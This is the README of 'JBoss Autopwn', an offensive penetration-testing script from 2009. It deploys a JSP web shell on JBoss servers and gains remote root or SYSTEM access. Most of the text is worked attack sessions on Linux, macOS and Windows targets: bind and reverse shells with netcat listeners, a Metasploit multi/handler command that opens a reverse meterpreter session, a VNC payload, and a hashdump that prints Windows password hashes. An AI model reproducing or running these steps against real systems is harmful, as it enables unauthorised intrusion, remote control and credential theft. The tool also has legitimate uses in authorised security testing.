Christian G. Papathanasioucpapathanasiou@trustwave.comINTRODUCTION============This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability toprovide an interactive session.Features include:- Multiplatform support - tested on Windows, Linux and Mac targets- Support for bind and reverse bind shells- Meterpreter shells and VNC support for Windows targetsINSTALLATION============Dependencies include- Netcat- Curl- Metasploit v3, installed in the current path as "framework3"USAGE=====Use e.sh for *nix targets that use bind_tcp and reverse_tcp./e.sh target_ip tcp_portUse e2.sh for Windows targets that can execute Metasploit Windows payloads/e2.sh target_ip tcp_portEXAMPLES========Linux bind shell:[root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null[x] Retrieving cookie[x] Now creating BSH script...[x] .war file created successfully in /tmp[x] Now deploying .war file:http://192.168.1.2:8080/browser/browser/browser.jsp[x] Running as user...:uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)[x] Server uname...: Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux[!] Would you like to upload a reverse or a bind shell? bind[!] On which port would you like the bindshell to listen on? 31337[x] Uploading bind shell payload..[x] Verifying if upload was successful...-rwxrwxrwx 1 root root 172 2009-11-22 19:48 /tmp/payload[x] You should have a bind shell on 192.168.1.2:31337..[x] Dropping you into a shell...Connection to 192.168.1.2 31337 port [tcp/*] succeeded!iduid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)python -c 'import pty; pty.spawn("/bin/bash")'[root@nitrogen /]# full interactive shell :-)Linux reverse shell:[root@nitrogen jboss]# nc -lv 31337 &[1] 15536[root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null[x] Retrieving cookie[x] Now creating BSH script...[x] .war file created successfully in /tmp[x] Now deploying .war file:http://192.168.1.2:8080/browser/browser/browser.jsp[x] Running as user...:uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)[x] Server uname...: Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux[!] Would you like to upload a reverse or a bind shell? reverse[!] On which port would you like to accept the reverse shell on? 31337[x] Uploading reverse shell payload..[x] Verifying if upload was successful...-rwxrwxrwx 1 root root 157 2009-11-22 19:49 /tmp/payloadConnection from 192.168.1.2 port 31337 [tcp/*] accepted[x] You should have a reverse shell on localhost:31337..[root@nitrogen jboss]# jobs[1]+  Running                 nc -lv 31337 &[root@nitrogen jboss]# fg 1nc -lv 31337iduid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)python -c 'import pty; pty.spawn("/bin/bash")';[root@nitrogen /]# full interactive tty :-)full interactive tty :-)Against MacOS X (bind shell):[root@nitrogen jboss]# ./e.sh 192.168.1.5 8080 2>/dev/null [x] Retrieving cookie[x] Now creating BSH script...[x] .war file created successfully in /tmp[x] Now deploying .war file:http://192.168.1.5:8080/browser/browser/browser.jsp[x] Running as user...:uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2)[x] Server uname...: Darwin helium-2.tiscali.co.uk 9.7.1 Darwin Kernel Version 9.7.1: Thu Apr 23 13:52:18 PDT 2009; root:xnu-1228.14.1~1/RELEASE_I386 i386 [!] Would you like to upload a reverse or a bind shell? bind[!] On which port would you like the bindshell to listen on? 31337[x] Uploading bind shell payload..[x] Verifying if upload was successful...-rwxrwxrwx 1 root wheel 172 22 Nov 19:58 /tmp/payload[x] You should have a bind shell on 192.168.1.5:31337..[x] Dropping you into a shell...Connection to 192.168.1.5 31337 port [tcp/*] succeeded!iduid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2)python -c 'import pty; pty.spawn("/bin/bash")'bash-3.2# ididuid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2)bash-3.2# Likewise for the reverse shell.Windows bind shell:[root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null[x] Retrieving cookie[x] Now creating BSH script...[x] .war file created succesfully on c:[x] Now deploying .war file:[x] Web shell enabled!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp[x] Server name...:        Host Name . . . . . . . . . . . . : aquarius[x] Would you like a reverse or bind shell or vnc(bind)? bind[x] On which port would you like your bindshell to listen? 31337[x] Uploading bindshell payload..[x] Checking that bind shell was uploaded correctly..[x] Bind shell uploaded: 22/11/2009  18:35            87,552 payload.exe[x] Now executing bind shell...[x] Executed bindshell![x] Reverting to metasploit....[*] Started bind handler[*] Starting the payload handler...[*] Command shell session 1 opened (192.168.1.2:60535 -> 192.168.1.225:31337)Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:/Documents and Settings/chris/Desktop/jboss-4.2.3.GA/server/default/tmp/deploy/tmp8376972724011216327browserwin-exp.war>Windows reverse shell with a Metasploit meterpreter payload:[root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null[x] Retrieving cookie[x] Now creating BSH script...[x] .war file created successfully on c:[x] Now deploying .war file:[x] Web shell enabled!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp[x] Server name...:        Host Name . . . . . . . . . . . . : aquarius[x] Would you like a reverse or bind shell or vnc(bind)? reverse[x] On which port would you like to accept your reverse shell? 31337[x] Uploading reverseshell payload..[x] Checking that the reverse shell was uploaded correctly..[x] Reverse shell uploaded: 22/11/2009  18:46            87,552 payload.exe[x] You now have 20 seconds to launch metasploit before I send a reverse shell back.. ctrl-z, bg then type:framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E[x] Now executing reverse shell...[x] Executed reverse shell![root@nitrogen jboss]#In terminal 2:[root@nitrogen jboss]# framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E[*] Please wait while we load the module tree...[*] Started reverse handler on port 31337[*] Starting the payload handler...[*] Sending stage (719360 bytes)[*] Meterpreter session 1 opened (192.168.1.2:31337 -> 192.168.1.225:1266)meterpreter > use privLoading extension priv...success.meterpreter > hashdumpAdministrator:500:xxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxx:::chris:1005:xxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::HelpAssistant:1004:5cb061f95caf6a9dc7d1bb971b333632:4ac4ee4210529e17665db586df844736:::SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:293c804ee7b7f93b3919344842b9c98a:::__vmware_user__:1007:aad3b435b51404eeaad3b435b51404ee:a9fa3213d080de5533c7572775a149f5:::meterpreter >Windows VNC shell:[root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null[x] Retrieving cookie[x] Now creating BSH script...[x] .war file created successfully on c:[x] Now deploying .war file:[x] Web shell enabled!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp[x] Server name...:        Host Name . . . . . . . . . . . . : aquarius[x] Would you like a reverse or bind shell or vnc(bind)? vnc[x] On which port would you like your  vnc shell to listen? 21[x] Uploading vnc  shell payload..[x] Checking that vnc shell was uploaded correctly..[x] vnc shell uploaded: 22/11/2009  19:14            87,552 payload.exe[x] Now executing vnc  shell...[x] Executed  vnc shell![x] Reverting to metasploit....[*] Started bind handler[*] Starting the payload handler...[*] Sending stage (197120 bytes)[*] Starting local TCP relay on 127.0.0.1:5900...[*] Local TCP relay started.[*] Launched vnciewer in the background.[*] VNC Server session 1 opened (192.168.1.2:52682 -> 192.168.1.225:21)[*] VNC connection closed.[root@nitrogen jboss]#>>VNC window opens here.. :-)COPYRIGHT=========JBoss Autopwn - A JBoss script for obtaining remote shell accessCopyright (C) 2009 Christian G. Papathanasiou,Trustwave SpiderLabs This program is free software; you can redistribute it and/ormodify it under the terms of the GNU General Public Licenseas published by the Free Software Foundation; either version 2of the License, or (at your option) any later version.This program is distributed in the hope that it will be useful,but WITHOUT ANY WARRANTY; without even the implied warranty ofMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See theGNU General Public License for more details.You should have received a copy of the GNU General Public Licensealong with this program; if not, write to the Free SoftwareFoundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.